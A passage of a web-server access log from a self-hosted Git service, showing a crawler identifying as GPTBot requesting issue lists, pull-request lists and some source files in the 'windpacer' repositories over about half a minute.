74.7.227.38] [Length 11868] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11868] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11870] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 110605] [Gzip 18.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:19:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 18052] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:31:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 